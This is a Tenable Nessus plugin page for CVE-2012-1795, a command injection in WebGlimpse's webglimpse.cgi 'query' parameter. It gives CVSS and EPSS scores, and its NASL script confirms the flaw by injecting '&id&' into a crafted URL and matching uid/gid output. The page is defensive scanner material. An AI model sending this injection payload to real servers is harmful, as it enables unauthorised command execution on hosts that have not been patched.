Lucene search

K
nessusThis script is Copyright (C) 2012-2022 Tenable Network Security, Inc.WEBGLIMPSE_QUERY_CMD_EXEC.NASL
HistoryMar 21, 2012 - 12:00 a.m.

WebGlimpse query Parameter Command Injection

2012-03-2100:00:00
This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.
www.tenable.com
11

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.015

Percentile

87.1%

The version of WebGlimpse installed on the remote host does not sufficiently sanitize user input to the ‘query’ parameter of the ‘webglimpse.cgi’ script before using it to construct and then run a command.

An unauthenticated, remote attacker can leverage this issue to execute arbitrary code on the affected host, subject to the privileges under which the web server runs.

Note that this vulnerability is being actively exploited in the wild as of March 2012.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(58412);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2012-1795");
  script_bugtraq_id(52627);
  script_xref(name:"CERT", value:"364363");

  script_name(english:"WebGlimpse query Parameter Command Injection");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a CGI script that contains a command
injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of WebGlimpse installed on the remote host does not
sufficiently sanitize user input to the 'query' parameter of the
'webglimpse.cgi' script before using it to construct and then run a
command.

An unauthenticated, remote attacker can leverage this issue to execute
arbitrary code on the affected host, subject to the privileges under
which the web server runs.

Note that this vulnerability is being actively exploited in the wild
as of March 2012.");
  script_set_attribute(attribute:"solution", value:
"Upgrade to WebGlimpse 2.20.0 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"d2_elliot_name", value:"WebGlimpse 2.18.8 RCE");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/03/20");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/02/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/03/21");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:webglimpse:webglimpse");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2022 Tenable Network Security, Inc.");

  script_dependencies("webglimpse_detect.nasl");
  script_require_keys("www/webglimpse");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");


port = get_http_port(default:80, embedded:FALSE);

install = get_install_from_kb(appname:"webglimpse", port:port, exit_on_fail:TRUE);
dir = install['dir'];


# Try to exploit the issue to run a command.
cmd = 'id';
cmd_pat = "uid=[0-9]+.*gid=[0-9]+.*";

payload = strcat('\'&', cmd, '&\'');
url = strcat(
  '/webglimpse.cgi?',
  'ID=1&',
  'query=', urlencode(str:payload, unreserved:"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_.!~*()-]"), '&',
  'rankby=DEFAULT&',
  'errors=0&',
  'age=&',
  'maxfiles=20&',
  'maxlines=10&',
  'maxchars=2000&',
  'wordspan=&',
  'cache=yes&',
  'prepath=&',
  'insertbefore=&',
  'postpath='
);
http_check_remote_code(
  port:port,
  unique_dir:dir,
  check_request:url,
  check_result:cmd_pat,
  extra_check:"Output from Glimpse:",
  command:cmd
);
exit(0, "The WebGlimpse install at '+build_url(qs:dir+'/webglimpse.cgi', port:port)+' is not affected.");

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.015

Percentile

87.1%

Related for WEBGLIMPSE_QUERY_CMD_EXEC.NASL